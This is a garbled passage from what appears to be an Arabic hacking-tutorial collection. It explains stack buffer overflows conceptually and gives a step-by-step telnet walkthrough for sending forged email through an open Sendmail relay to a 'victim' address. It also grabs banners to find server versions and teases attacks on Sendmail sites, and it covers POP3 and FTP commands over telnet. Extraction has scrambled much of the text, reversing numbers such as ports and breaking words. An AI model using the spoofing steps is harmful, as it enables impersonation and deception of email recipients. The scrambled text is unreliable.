routine‬رئیسي‪ ‬‬


‫(‪(main‬يقوم‪ ‬‬ ‫باستدعاء الــ ‪subroutines‬والتي تنفذ تعلیمات محدده ‪ function‬ومن ثم تعید‪ ‬‬ ‫التحكم مره اخره الي ‪ main‬‬ ‫الــ ‪subroutines‬لتقوم بعملھا علیھ ا تخزن بیانات مختلفه وتستخدم لذلك‪ ‬‬ ‫منطقه معینه من الذاكره تسمي ‪ stack‬‬ ‫لتخزين ھذه البیانات ‪ .‬ھذه البیانات من ضمنھا عنوان في الذاكره ‪ memory‬‬ ‫‪address‬الذي يقوم الــ‪ subroutines‬‬ ‫باعاده التحكم الیه بعد ان ينجز المھ مه التي برمج من اجلھا ‪ .‬كذلك‪ ‬‬ ‫الــ ‪Subroutines‬يخزن بیانات موقته التي نسمیھا‪ ‬‬ ‫‪buffer‬في الــ ‪stack‬في كل مره ينفذ فیھ ا والذاكره المطلوبه يتم تحديدھا في‬ ‫الــ ‪stack‬في وحده قیاس تسمي‪ ‬‬ ‫‪stack frame .‬الــ ‪stack frame‬يحتوي علي مساحه لي ‪ buffer‬ممكن يحتاجه‬ ‫‪ 721‬‬ ‫الــ ‪ subroutine‬كذلك عنوان اعاده التحكم ‪ return address‬الي الــ ‪ routine‬‬ ‫الساسي والذي قام اساسا باستدعاء ھذا‪ ‬‬ ‫الـــ ‪subroutine .‬بعد ان يقوم الــ ‪subroutine‬بانھاء عمله يعید التحكم الي‪ ‬‬ ‫الــ ‪ routine‬‬ ‫الذي قام باستدعائه بالقفز مباشره الي عنوانه الموجود في الــ ‪ stack frame‬‬ ‫ومن ثم يتم حذف الــ ‪ stack frame‬‬ ‫میكانیكیه الداء ھ ذه تعمل بشكل رائع حتي يحدث الــ ‪buffer overflows .‬اذا‪ ‬‬ ‫ارسلنا ‪ 005‬خانه الي ‪ stack buffer‬‬ ‫مخصص لـ ‪ 001‬خانه نكون بذلك قد قمنا بالكتابه فوق ‪ 004‬خانه علي الذاكره‪ ‬‬ ‫المجاوره للـ ‪stack frame‬مما يعني اننا كتبنا فوق عنوان‪ ‬‬ ‫العاده وكذلك ‪ buffers‬اخري‪ ‬‬ ‫الن في ھذه الحاله عندما يحاول الــ ‪subroutine‬اعاده التحكم الي ‪ main‬‬ ‫سوف يقفز الي العنوان المحدد في الـ ‪ stack frame‬‬ ‫والذي قمنا قبل قلیل بالكتابه علیه عن طريق ‪ overflowed buffer‬مالذي‪ ‬‬ ‫يحدث الن ؟‪ ‬‬ ‫عندما يحاول البرنامج ان يقفز الي عنوان غیر موجود ببساطه يتحطم ‪ crash .‬‬ ‫الن لنري كیف تكون الحلول الذكیه‪ ‬‬ ‫والكثر مھاره ‪ .‬عند ارسال ‪ 005‬خانه مختاره بعنايه يستطیع المھاجم التحكم‪ ‬‬ ‫بالــ ‪ return address‬‬ ‫بدل الذھ اب الي عنوان غیر موجود وتحطیم البرنامج يقوم بتوجیه البرنامج للقفز‪ ‬‬ ‫الي عنوان كود الستثمار ‪ exploit‬وتنفیذه‪ ‬‬ ‫وقبل ھذا يجب علي المھاجم تنفیذ مھمتین‪ ‬‬ ‫الولي ‪ :‬عمل ‪ load‬للكود الذي ينوي استخدامه‪ ‬‬ ‫الثانیه ‪ :‬تنفیذ ھذا الكود اي تشغیله‪ ‬‬ ‫طبعا الــ ‪stack buffer‬يقوم بانجاز كل المھمتین ‪ .‬يقوم المھاجم بارسال سلسه‬ ‫حرفیه طويله كمدخلت للبرنامج‪ ‬‬ ‫وتحتوي ھ ذه السلسه علي الكود المراد تنفیذه وكذلك عنوانه بالذاكره ‪ .‬عندما‪ ‬‬ ‫يحدث الــ ‪overflows‬يتم عمل ‪ load‬‬ ‫للكود المرسل في الــ ‪stack memory‬وكذلك الـ ‪return address‬للــ ‪subroutine‬‬ ‫يتم‪ ‬‬ ‫الكتابه علیه وتغییره لیصبح عنوان الكود المراد تنفیذه ‪ .‬ھكذا عندما ينھي‪ ‬‬ ‫الــ ‪subroutine‬عمله يقفز الي عنوان‪ ‬‬ ‫كود المھ اجم فینفذ الكود ‪ .‬الن الكود كما قلنا قد يفرمت الھ ارد وممكن يركب‪ ‬‬ ‫‪ 821‬‬ ‫باك دور وممكن يھ اجم بقیه الشبكه ببساطه يمكن‪ ‬‬ ‫ان يكون الكود اي شي يمكن ان ينفذه الشخص علي نظامه ‪ .‬لكن سماحیات‬ ‫البرنامج المخترق تحدد بشكل كبیر اي نوع من الھجمات‪ ‬‬


‫يمكن ان تطبق علیه ‪ .‬فمثل اذا كان البرنامج يعمل ‪ root‬فیمكن تنفیذ اي امر‪ ‬‬ ‫مھما كان ‪ ,‬وكلما قلت الصلحیات قلت اخطار الھجوم‪ ‬‬ ‫ھناك مايسمي بالــ ‪ Entercept‬يحتوي علي تكنولوجیا محمیه تمكنه من منع‪ ‬‬ ‫تنفیذ البرامج في حاله ‪ overflows‬‬ ‫و يعتبر حل امني قوي وموثوق ولكن للسف لیس خیرا جیدا لنظمة النتاج‪ ‬‬ ‫ويسبب اشكالیه عند محاوله تركیب باتشات الرقع المنیه‪ ‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫خلصه الموضوع‪ :‬‬ ‫‪1‬يعتقد الكثیرون ان ھذا الھجوم حالیا ليطبق ال علي البرمجیات الضعیفه‪ ‬‬‫والغیر مھمه وھ ذا اكبر خطا ممكن ان الشخص ممكن يرتكبه‪ ‬‬ ‫قال لي يومااا احد محترفي امن المعلومات ‪ Buffer overflow exploits are‬‬ ‫‪ here to stay‬‬ ‫ويقصد ان الھجوم ھ نااااا لیبقي طويلااااااا لسببین ‪:‬لن الكمال الله ولن‪ ‬‬ ‫المبرمجین لن يعملوا مجددا اذا كتبوا برنامجا ل يعید الزبون الیھم‪ ‬‬ ‫ومن وجه نظري انه ليوجد برنامج واحد كبیر ول صغیر يعمل ‪checked buffers‬‬ ‫كامل ‪ .‬‬ ‫اضافه ان ھناك عامل نفسي عند المبرمجین يدفعھم للخطاء سواء بوعي او‪ ‬‬ ‫بغیره كسلوك احترازي اذا تمكن الشخاص من استخدام مافعلوه‪ ‬‬ ‫ونسوھم فتجد في ال وعي عندھ م عباره عندما استطیع بناء قصر ول يمكنني‬ ‫ان اسكنة فانا اعرف كیف ادمره امزح بالخیره‪ ‬‬ ‫واخیرا‪ :‬‬ ‫الھجوم منتشر سھل وقوي ‪ ........‬مع تحیاتي‪ ‬‬ ‫‪ 921‬‬ ‫ماھو ‪ Send Mail‬‬ ‫للكاتب‪ IcEr:‬‬ ‫السلم علیكم و رحمة االله و بركاته ‪ ):‬‬ ‫موضوع الیوم ھو شرح ل‪ send mail‬و ھ و مترجم من احد المواضیع الجنبیه‪ ‬‬ ‫قراتھا و حبیت اترجمھا لكم ‪ ):‬‬ ‫المھم خلینا نشوف ايش ال ‪ sendmail‬ھذا‪ ‬‬ ‫‪ sendmail‬عباره عن ديمون و ھو يعمل على البورت ‪ 52‬و يعمل على ارسال‪ ‬‬ ‫اليمیلت‪ ‬‬ ‫(رسائل صادره)‪ ‬‬ ‫مثل ‪...‬مقدم الخدمه لديك قد يستعمل ملقمین لل ‪ sendmail‬‬ ‫الول الصادر مثل ‪ mailgw.xxxxx.com‬و ھو على البورت ‪ 52‬‬ ‫و الثاني الوارد مثل ‪ mail.xxxxx.com‬و ممكن يعمل على البورت ‪ 011‬‬ ‫بالنسبه للوارد فھ و قد يحتاج الى كلمه سر و يوزرنیم ‪....‬لذلك ليمكنك ان ترى‪ ‬‬ ‫الرسائل الوارده ‪ ):‬‬ ‫لكن ‪ ):‬و يالعجب ‪..‬فان الملقم ‪ mailgw.xxxxx.com‬ل يحتاج لكلمه سر و‪ ‬‬ ‫لاسم مستخدم‪ ‬‬ ‫مامعنى ھذا؟؟؟؟معناه انك اذا دخلت ال‪ telnet‬و شبكت مع‪ ‬‬ ‫‪ mailgw.xxxxx.com‬على البورت ‪ 52‬و استعملت‪ ‬‬ ‫اوامر ال ‪ telnet‬فانه يمكنك ان ترسل رسائل ‪ (: fake email‬‬ ‫ايه رايك؟؟؟‪ ‬‬ ‫تعال نشوف ازاي نرسل مثل ھ ذه الرسايل و كمان ;) ممكن تخترق موقع‪ ‬‬ ‫يشغل برنامح ال ‪<< sendmail‬بس ل تستعجل‪ ‬‬ ‫كما قلنا فانه يمكن ان ترسل ايمیلت من خلل ملقم الرسائل الصادره حیث انه‬ ‫ل يتطلب اي اشتراك‪ ‬‬ ‫اذن فكل المطلوب ھ و الي بي حق السیرفیر او الھوست نیم و اوامر التلنت‪ ‬‬ ‫المستخدمه في ال‪ sendmail‬‬ ‫‪ <======start‬‬


‫‪ remote system<======connect<====telnet<======run‬‬ ‫‪ mailgw.xxxxx.com‬‬ ‫‪m‬‬ ‫في الھوست نیم اكتب الملقم للرسائل الصادره مثل‬ ‫‪ connect‬‬ ‫‪c‬‬ ‫و في البورت اكتب ‪ 52‬ثم‬ ‫كده‪ ‬‬ ‫ممكن تلقي حاجه زي ه‬ ‫‪ 031‬‬ ‫‪ alpha.xxxxx.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 220‬‬ ‫‪ .(GMT) 21:46:04 +0000‬‬ ‫ذا؟؟؟؟‪ ‬‬ ‫؟‬ ‫ايش ھ‬ ‫ال‪ ‬‬ ‫ھذا ما يسى بالبانار و ھو عاده يحتوي عن بعض المعلومات عن اصدار ل‬ ‫على‪ ‬‬ ‫‪ program sendmail‬الموجود ى‬ ‫اصدار‪ ‬‬ ‫ر‬ ‫السرفر ‪...‬على فكره ‪...‬البانار ده مھم للھ اكر لنه عن طريقه بیحدد اي‬ ‫موجود‪ ‬‬ ‫د‬ ‫ال‪sendmail ‬‬ ‫من ل‬ ‫كان‪ Sendmail ‬‬ ‫و ده حیفیده في حاجات كتیره ‪!!!..‬الصدار في المثال السابق ن‬ ‫‪ ;8.8.6/8.9.3‬‬ ‫نشوف‪ : ‬‬ ‫ف‬ ‫المر‪ help ‬و‬ ‫ر‬ ‫تعال نكتب‬ ‫‪ This is Sendmail version 8.9.3­214‬‬ ‫‪ :Topics­214‬‬ ‫‪ HELO EHLO MAIL RCPT DATA ­214‬‬ ‫‪ RSET NOOP QUIT HELP VRFY ­214‬‬ ‫‪ EXPN VERB ETRN DSN ­214‬‬ ‫‪ ."<topic> HELP" For more info use­214‬‬ ‫‪ To report bugs in the implementation send email to­214‬‬ ‫‪ .sendmail­bugs@sendmail.org ­214‬‬ ‫‪ .For local information send email to Postmaster at your site­214‬‬ ‫‪ End of HELP info 214‬‬ ‫التالي‪ ‬‬ ‫ي‬ ‫ماشي ‪....‬سیبك من ده ‪....‬اكتب‬ ‫‪ <fake Email address> :MAIL FROM‬‬ ‫تضغط‪ shift + ctrl ‬شمال لترى المر جیدا ‪....‬اكتبه كما ھو بالقواس و بدل‬ ‫ل‬ ‫ط‬ ‫لزم‬ ‫‪ email address fake‬‬ ‫حاجه‪...‬مثل‪ icer@AoEgH.org ‬‬ ‫ل‬ ‫اكتب اليمیل الذي تريده ‪...‬اي‬ ‫كده‪ : ‬‬ ‫حتلقي الرد ه‬ ‫‪ icer@AoEgH.com... Sender ok 250‬‬ ‫التالي‪ ‬‬ ‫ي‬ ‫اكتب المر‬ ‫‪ <recipient> :RCPT TO‬‬ ‫ال‪ recipeint ‬اكتب ايمیل المرسل الیه ‪...‬يجب ان تجصل على رساله تقول‬ ‫ل‬ ‫بدل ل‬ ‫‪ victim@victim.com... Recipient ok 250‬‬ ‫‪ 131‬‬ ‫و‪ victim@victim.com ‬‬ ‫لو كان ايمیل المرسل الیه ھو‬ ‫مرات‪ ... ‬‬ ‫ت‬ ‫المھ م‪...‬ممكن تبعت لكتر من ايمیل ببساطه بتكرار المر عده‬ ‫كده‪ data ‬‬ ‫اكتب بعد ه‬ ‫‪ on a line by itself "." Enter mail, end with 354‬‬ ‫كالتالي‪ ‬‬ ‫ي‬ ‫اكتب الرساله و لتكن‬ ‫تريده‪ ( ‬‬ ‫ه‬ ‫‪( Subject: fake message‬اكتب اي عنوان انت‬ ‫‪ .Hello. This is a fake Email message‬‬ ‫‪ .I'm bored‬‬ ‫‪ !!Gimme something to hack‬‬ ‫كده‪ ‬‬ ‫لزم تلقي حاجه زي ه‬ ‫‪ CAA15313 Message accepted for delivery 250‬‬ ‫ى‪ message ID ‬‬ ‫فیه رقم موجود بجانب ال ‪ 052‬ھذا الرقم يسمى‬ ‫الله‪ (: ‬‬ ‫>>>>كده يبقى الرساله اتبعتت و الحمد ه‬


‫روح‬..... ‫لو انت كنت بعت الرساله الى ايمیل لك‬... ‫تعالى نشوف حاجه تانیه‬ header ‫ھناك و افتح الرساله و شوف ال‬ : ‫حتلقي الكلم ده‬..... ‫بتاعھا‬ Received: from alpha.netvision.net.il (alpha.netvision.net.il cmx.netvision.net.il (8.9.3/8.9.3) with ESMTP id [194.90.1.13]) by Sat, 10 Jul 1999 02:49:59 +0300 ;<victim@victim.com CAA15313 for ((IDT From: icer@AoEgH.com Received: from some.hostname.crap.com (some.hostname.crap.com 132 alpha.xxxxxx.com (8.9.3/8.8.6) with SMTP id [62.0.146.225]) by Jul 1999 02:55:46 +0300 10 ,CAA15313 for victim@victim.com; Sat ((IDT (Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT <CAA15313@alpha.xxxxx.com .199907092355> :Message­ID X­Authentication­Warning: alpha.xxxxx.com: some.hostname.crap.com didn't use HELO protocol [[62.0.146.225 Subject: Fake mail :Status X­Mozilla­Status: 8001 X­Mozilla­Status2: 00000000 X­UIDL: 3752da3b000002ff : ‫تعال نشوف الجزا الول كمثال‬ Received: from alpha.xxxxx.com (alpha.xxxxx.com [194.90.1.13]) by Sat, 10 ;< with ESMTP id CAA16970 for (8.9.3/8.9.3) cmx.xxxxx.com (GMT) Jul 1999 02:49:59 +0000 ([alpha.xxxxx.com [194.90.1.13) ‫اھااااا‬ whois alpha.xxxxx.com ‫لو عندنا يونیكس و كتبنا المر ده في التیرمینال‬ <<<< samspade ‫او من الويندوز باستخدام الداه‬ sub­server ‫ اي انھا عباره عن مايسمى‬xxxxx.com ‫سنجد انھا تتبع الموقع‬ .. ‫لرسال اليمیلت‬ ............................................................................................ ‫كیف يمكنك ان تخترق موقع به برنامج ال‬..... ‫الموضوع لم ينتھ ي بعد‬ <<<sendmail ‫ان شاء االله اترجمه ان كان في العمر بقیه‬ 133 3POP ‫ماھو‬ KING_ABDO:‫للكاتب‬ ‫؟‬3 pop ‫ما ھو الـ‬ =­=­=­=­=­=­=­=­ pop = Post Office protocol web­based ‫ھو بروتوكول يستخدم لستعمال أي بريد غیر البريد من نوع ال‬ Email ‫ھو أي بريد ل يمكن استخدامه ال عبر موقع معین حیث‬ web­based Email ‫سوف‬ ‫يحتوي ھذا الموقع على العديد من العلنات التي تستفید منھا الشركة‬ ‫المزودة‬ ‫للبريد ماديا‬ ‫و أي بريد آخر ھ و الذي يمكن الدخول الیه و استخدامه عبر أي أداة للبريد‬ : ‫و ھ و يستخدم نوعین من البروتوكولت و ھما‬


‫‪ SMTP = Simple Mail Transfer Protocol‬‬ ‫‪ POP = Post Office Protocol‬‬ ‫كل ما تحتاجه ھو عمیل تلنت و ھو موجود في نظام تشغیل وندوز‪ ‬‬ ‫و الن سوف نتصل بملقم خدمة ‪ pop‬و كثیرا ما يكون بھذاالشكل‪ ‬‬ ‫‪ mail.xxx.com‬‬ ‫اذا كان الموقع ھو ‪ www.xxx.com‬‬ ‫سوف نتصل بالملقم عبر المنفذ رقم ‪ 011‬و ھو المنفذ الفتراضي‪ ‬‬ ‫‪ 431‬‬ ‫في نظام وندوز اتبع التالي‪ ‬‬ ‫‪ start‬‬ ‫|‪ ‬‬ ‫‪ run‬‬ ‫|‪ ‬‬ ‫اكتب ‪ telnet mail.xx.com 011 :‬‬ ‫و بدل ‪ xx‬بعنوان الموقع‪ ‬‬ ‫سوف تفتح نافذة التلنت و عندما يتم التصال سوف يظھر التالي ‪ :‬‬ ‫‪ +OK POP3 [183.90.5.0] v7.60 server ready‬‬ ‫و الن سوف نقوم بتعريف أنفسنا للملقم عبر تزويده باسم المستخدم و كلمة‬ ‫السر الخاصین ببريدك فنقوم بكتابة المر التالي لتزويده باسم المستخدم ‪ :‬‬ ‫‪ user username‬‬ ‫سوف يظھر العبارة التالیة ‪ :‬‬ ‫‪ +OK User name accepted, password please‬‬ ‫و ھ نا يطلب منك كلمة السر الخاصة باسم المستخدم الذي أدخلته فنقوم‪ ‬‬ ‫بكتابة‪ ‬‬ ‫المر التالي لتزويدة بكلمة السر ‪ :‬‬ ‫‪ pass your­password‬‬ ‫اذا كانت المعلومات المعطاه صحیحه سوف يظھر التالي ‪ :‬‬ ‫‪ +OK Mailbox open, x messages‬‬ ‫حیث ‪ x‬ھو عدد الرسائل الموجودة في البريد‪ ‬‬ ‫أما اذا كانت المعلومات غیر صحیحة ‪ :‬‬ ‫‪ 531‬‬ ‫‪ ­ERR Bad login‬‬ ‫و الن نقوم بكتابة المر ‪ list‬لكي نري قائمة بالرسائل الموجودة و عندھا‪ ‬‬ ‫سوف نحصل على سطر واحد فقط يحتوي على رقم الرسالة و على حجمھا‬ ‫و إذا أردنا قراءة رسالة فنقوم بكتابة المر ‪ retr x‬‬ ‫حیث ‪ x‬ھو رقم الرسالة و عندھا سوف نرى الرسالة بكاملھا‪ ‬‬ ‫و اذا أردنا مسح رسالة نقوم بكتابة المر ‪ dele x‬‬ ‫حیث ‪ x‬ھو رقم الرسالة‪ ‬‬ ‫و عندما تنتھ ي و تريد الخروج كل ما علیك فعله ھ و أن تكتب المر ‪ quit‬‬ ‫في النھ اية يجب أن تعرف أنه عندما تقوم بالدخول الى بريدك يتم انشاء ملف‬ ‫‪ lock file‬و يتم مسحه عندما تخرج من البريد و ذلك حتى ل يسمح لحد بأن‬ ‫يدخل الى البريد و أنت تستخدمه ‪ .‬‬ ‫‪ 631‬‬ ‫ماھو التلنت‪ ‬‬ ‫للكاتب‪ :‬محمد قطان‪ ‬‬ ‫‪ Telnet‬كان ومازال الداة المفضلة لمخترقي المواقع ( الھ كرز ) ‪ ....................‬‬ ‫ماھو ال ‪ Telnet‬؟؟؟؟؟؟؟؟؟؟ وما استخداماته ؟؟؟؟؟ كل شي بالتفصیل‪ ‬‬ ‫‪ ...............‬‬ ‫يعتبر ‪ Telnet‬بروتوكول من بروتوكولت ‪ TCP/IP‬للتصال بأجھزة الكمبیوتر البعیدة‬ ‫‪ ,‬كما أنه تطبیق‪ ‬‬


‫من تطبیقات ‪ TCP/IP‬يتم استخدامه في تشغیل برامج ‪ Telnet‬لكي يتم‪ ‬‬ ‫استخدام جھ از الكمبیوتر بطريقة‪ ‬‬ ‫فعالة كما لو كنت تجلس أمامه ‪ .‬‬ ‫كیف يتم التصال ؟؟؟؟؟‪ ‬‬ ‫يتم التصال باستخدام تطبیق ال ‪ Telnet‬الموجود على الوحدة التابعة ( الجھاز‪ ‬‬ ‫المتصل ) بالتصال بتطبیق ‪ Telnet‬‬ ‫الموجود على وحدة الخدمة ( الجھاز الھدف ) وعادة ما يكون ‪ Telnet Daemon‬‬ ‫‪ ..................‬‬ ‫يبدأ التصال من تطبیق الوحدة التابعة ( على جھاز الكمبیوتر المحلي المتصل )‬ ‫====== إلى البروتوكول‪ ‬‬ ‫(الموجود أيضا على جھاز الكمبیوتر المحلي المتصل ) ===== ثم ينتقل على‬ ‫شبكة التصال ======‪ ‬‬ ‫إلى بروتوكول ‪ ) Telnet‬الموجود على جھاز الكمبیوتر البعید ) ==== ثم إلى‪ ‬‬ ‫خدمة‪ ‬‬ ‫‪ ) Telnet‬على جھاز الكمبیوتر البعید ) وھو طبعا الجھاز الھدف ‪ ..........‬‬ ‫وھنا يعمل تطبیق ‪ Telnet‬كبرنامج محاكاة ‪ ,‬ويتم إرسال أية أوامر يقوم المتصل‪ ‬‬ ‫بكتابتھا عبر الشبكة لكي‪ ‬‬ ‫يتم تنفیذھا من قبل جھ از الكمبیوتر البعید ‪ ......‬‬ ‫علما أن ال ‪ Telnet Daemon‬يستمع على المنفذ ‪ 32‬في انتظار التصال به ‪ .‬‬ ‫‪ 731‬‬ ‫خدمات ال ‪ : Telnet‬‬ ‫‪ -1‬يمكنك استخدام ال ‪ Telnet‬كمتصفح ويب لي موقع ‪ ,‬ولكنه سیعرض لك‪ ‬‬ ‫مصدر الصفحة حصرا أي‪ ‬‬ ‫ال ‪ Source‬للصفحة ‪ ,‬وذلك لن خدمة ال ‪ Telnet‬كانت ُستخدم عندما كانت‪ ‬‬ ‫ت‪ ‬‬ ‫مواقع النترنت‪ ‬‬ ‫مجرد نصوص ‪ .......‬‬ ‫‪ -2‬ويمكن استخدام ال ‪ Telnet‬أيضا ك ‪ Client FTP‬فھو يعمل عمل ‪ Gute FTP‬‬ ‫تماما وذلك‪ ‬‬ ‫باستخدام أوامر يتم إدخالھا من خلل ال ‪ ........ Telnet‬‬ ‫‪ -3‬ويمكنك من خلل ال ‪ Telnet‬أيضا تصفح اليمیل ‪ POP Mail‬وقراءة رسائلك‪ ‬‬ ‫الواردة وارسال ما تريد‪ ‬‬ ‫من رسائل ‪ ,‬وھ ذا طبعا اذا كان اليمیل من نوع ‪ POP Mail‬‬ ‫وھو اختصار ل ‪ ........ Post Office Protocol‬طبعا يختلف عن ايمیل الويب‪ ‬‬ ‫المستخدم حالیا‪ ‬‬ ‫مثل ‪ Yahoo‬و ‪ ...... Hotmail‬‬ ‫ومن المواقع التي تقدم مثل ھذه الخدمة مثل ‪ /http://www.hotpop.com :‬‬ ‫كما أن ل ‪ Telnet‬خدمات أخرى ل حاجة لذكرھا ھنا لن معظمھا أصبح قديما‪ ‬‬ ‫وربما عديم الفائدة‪ ‬‬ ‫نوعا ما ‪ ...........‬‬ ‫تشغیل ‪ Telnet‬وضبط إعداداته ‪ :‬‬ ‫يمكنك تشغیل ‪ Telnet‬من ‪ ==== Start === Run‬ثم نكتب ‪ ......... Telnet‬‬ ‫كما يمكنك تشغیله من متصفح === اذھب الى الكسبلورر و اكتب ‪///:telnet‬‬ ‫ولضبط إعداداته حتى يعمل بشكل صحیح نقوم بالتالي ‪ :‬‬ ‫إذھب الى القائمة ‪ === Terminal‬ثم اختر منھا ==== ‪ Preferences‬ثم نقوم‬ ‫بتفعیل‪ ‬‬ ‫( وضع علمة الصح ) على كل من ‪ VT ­ 100/ANSI‬و ‪ Echo Local‬و ‪ Block‬‬ ‫‪ 831‬‬ ‫‪ Cursor‬‬ ‫والن ‪ Telnet‬جاھز للعمل ‪ .....‬‬


‫‪ ........... FTP‬‬ ‫‪.‬‬ ‫استخدام ال ‪ Telnet‬كبروتوكول نقل الملفات‬ ‫من القائمة ‪ Connect‬اختر ‪ Remote System‬ثم اكتب في ال ‪ Host Name‬م‬ ‫اسم‬ ‫الموقع‪ ‬‬ ‫ع‬ ‫المراد التشبیك علیه مثال ذلك ‪ ::‬‬ ‫‪ FTP.Yahoo.com‬‬ ‫‪ ..........‬‬ ‫‪.‬‬ ‫واكتب كذلك البورت وغالبا ما يستخدم ال ‪ FTP‬بورت ‪12‬‬ ‫عندما يتم نجاح التصال سیطلب منك ادخال اسم المستخدم ‪ User‬و‪ ‬‬ ‫الباسوورد ‪ Pass‬قم بإدخالھما اذاا‪ ‬‬ ‫ن‪ ‬‬ ‫كنت تعرفھ ما أو ادخل بواسطة ( المستخدم المجھول ) ‪ Anonymouns‬اذا كان‬ ‫الخدمة‪ ‬‬ ‫ة‬ ‫الموقع يدعم ھذه‬ ‫ومثال ذلك ‪ .....‬عندما يطلب منك ادخال اسم المستخدم اكتب ما يلي ‪ ::‬‬ ‫‪ User Anonymouns‬‬ ‫بريدك‪ ‬‬ ‫ك‬ ‫ثم أدخل كلمة السر وفي ھذه الحالة ( المستخدم المجھول ) اكتب له‬ ‫بريدك‪ ‬‬ ‫ك‬ ‫أو أي بريد إذا لم تشأ بإدخال‬ ‫الشخصي ومثال ھذا ‪ ::‬‬ ‫‪ Pass @ your mail‬‬ ‫الذي‪ ‬‬ ‫بعد ذلك يظھ ر لك ما يدل على أنه تم التصال والدخول الى الكمبیوتر ي‬ ‫تتصل به وغالبا ما تكون الرسالة كالتالي ‪ ::‬‬ ‫‪ 032 Logged in anonymously‬‬ ‫يتم‪ ‬‬ ‫والن يجب أن تعمل ما يشبه صیغة اتصال بینك وبین الموقع وذك حتى م‬ ‫‪ ..........‬‬ ‫‪.‬‬ ‫إرسال واستقبال الملفات من خللھا‬ ‫ويتم ذلك باستخدام المر ‪ , PASV‬وعند ارسالك لھذا المر سیرد علیك السیرفر‬ ‫ر‬ ‫برقم‪ ‬‬ ‫م‬ ‫الذي تتصل به‬ ‫ي‪ ‬‬ ‫مؤلف من ستة خانات وھي تشمل ال ‪ IP‬الخاص به و المنفذ المفتوح الذي‬ ‫سوف تستخدمه للشبك على الموقع ‪ ..‬‬ ‫مثال ما يرسله لك السیرفر ‪ ::‬‬ ‫‪ 722 Mode Entring Passive‬‬ ‫‪ 84,41,96,56,981,802‬‬ ‫؟؟؟؟؟؟‪ ‬‬ ‫؟‬ ‫ولكن ما تفسیر الستة خانات ھذه‬ ‫‪ 931‬‬ ‫تفسیر ذلك كالتالي ‪ ::‬‬ ‫للموقع‪ ‬‬ ‫ع‬ ‫الربع خانات الولى( من الیسار الى الیمین ) ھي رقم الي بي ‪IP‬‬ ‫بواسطته‪ ‬‬ ‫ه‬ ‫والذي سوف نشبك‬ ‫ي‪ :‬‬ ‫على الموقع ‪.....‬وھ ‪:‬‬ ‫‪ 96,56,981,802‬‬ ‫واما الخانتین الخیرتین فھما لحساب رقم البورت الذي سوف نستخدمه لنشاءء‬ ‫التصال بالموقع ‪ ,,‬‬ ‫وطريقة حسابه كالتالي ‪ ::‬‬ ‫ب‪ ‬‬ ‫نضرب الرقم الذي ھو قبل الخیر ( ‪ ) 41‬ب ‪ , 652‬ثم نجمع إلى حاصل الضرب‬ ‫الرقم الخیر وھو ( ‪ ) 84‬‬ ‫والناتج ھو رقم البورت المطلوب ‪ ,‬والعملیة تتم كالتالي ‪ ::‬‬ ‫‪ 41 * 652 = 8453+84 = 2363‬‬ ‫‪ ..............‬‬ ‫‪.‬‬ ‫فرقم البورت ھو ‪2363‬‬ ‫تحلیل العملیة الحسابیة ‪ ::‬‬ ‫ر‪ ‬‬ ‫قد تتساءل ھنا لماذا ضربنا الرقم ب ( ‪ ) 652‬والجواب أنه عندما يعین سیرفر‬ ‫للوصول‪ ‬‬ ‫ل‬ ‫الموقع بورت ما‬ ‫للتشبیك من خلله فإنه يرسله لنا بعد أن يحوله الى النظام السداسي عشر (‬ ‫ة‪ ‬‬ ‫‪ ( Hex‬فیقوم بعملیة قسمة‬ ‫ي‪ ‬‬ ‫رقم البورت على ‪ ) 61 * 61 ( .... 652‬وناتج القسمة ھو الرقم الول والباقي‬ ‫ھو الرقم الخیر والمثال كما ترى ‪ ::‬‬


‫‪ ( 2363‬رقم البورت ) ‪ ( 41 = 652 /‬الرقم الول ) والباقي من القسمة ‪ ( 84‬‬ ‫الرقم الخیر ) ‪ ..‬‬ ‫ھذا كل ما في المر ‪ ..‬‬ ‫ح‪ ‬‬ ‫والن بعد أن عرفنا الي بي ‪ IP‬والبورت الذي سنشبك من خللھما ‪ ,‬نقوم بفتح‬ ‫ونشبك‪ ‬‬ ‫ك‬ ‫نافذة جديدة‬ ‫على الموقع ولیكن مثل ‪ ::‬‬ ‫‪ FTP.Yahoo.com‬‬ ‫‪ 2363‬‬ ‫‪2‬‬ ‫ونضع البورت وھو‬ ‫أو‪ ‬‬ ‫والن أنت في الموقع ويمكنك إدخال البیانات التي تريدھا أو سحب مجلد و‬ ‫‪ .............‬‬ ‫‪.‬‬ ‫ملف‬ ‫‪ 041‬‬ ‫التصفح‪ ‬‬ ‫ح‬ ‫ولكن انتبه الى أن ( المستخدم الجھ ول ) صلحیته محدودة في‬ ‫‪ ...........‬‬ ‫بعض الوامر التي تلزمك لعرض وتصفح المجلدات ‪ ::‬‬ ‫‪ ls‬لعرض جمیع المجلدات والملفات والدلة الموجودة في المكان الحالي ‪ ...‬‬ ‫س‪ ‬‬ ‫يشبه ھذا المر المر ( ‪ (dir‬في الدوس‬ ‫ف‪ ‬‬ ‫‪ del‬لحذف مجلد أو ملف‬ ‫ت‪ ‬‬ ‫‪ list‬لستعراض الملفات والمجلدات‬ ‫ع‪ ‬‬ ‫‪ syst‬لمعرفة نوع السیرفر في الموقع‬ ‫‪ abor‬للغاء أي عملیة تقوم بھا‪ ‬‬ ‫ر‪ ‬‬ ‫‪ renfr‬و ‪ rento‬لنقل مجلد أو ملف من مكان لخر‬ ‫‪ rest‬لكمال عملیة تم إيقافھا‪ ‬‬ ‫ة‪ ‬‬ ‫‪ help‬لطلب مساعدة‬ ‫‪ pwd‬لخبارك ماھ و المجلد الي انت متواجد فیه الن ‪ .‬‬ ‫د‪ ‬‬ ‫‪ mkd‬لنشاء مجلد جديد‬ ‫ر‪ ‬‬ ‫‪ man‬وھو اختصار لـ (‪ (Manual‬ويتیح لك مشاھدة الخیارات المتاحة لكل امر‬ ‫المتاحة‪ ‬‬ ‫ة‬ ‫مثل لمشاھدة الخیارات‬ ‫‪ man ls‬‬ ‫‪m‬‬ ‫للمر ‪ ls‬نكتب‬ ‫المور‪ ‬‬ ‫ر‬ ‫والن سأتكلم عن تصفح اليمیل باستخدام التلنت واوضح لك بعض‬ ‫‪ ...‬‬ ‫الغامضة عن ھذه الداة ‪.‬‬ ‫د‪ ‬‬ ‫ھناك الكثیر من المواقع على الشبكة تقدم خدمة ‪ Telnet‬وھذه المواقع قد‬ ‫تعود ملكیتھا الى شركات خاصة او الى جھ ات حكومیة ‪ ,‬وتتنوع محتوياتھاا‪ ‬‬ 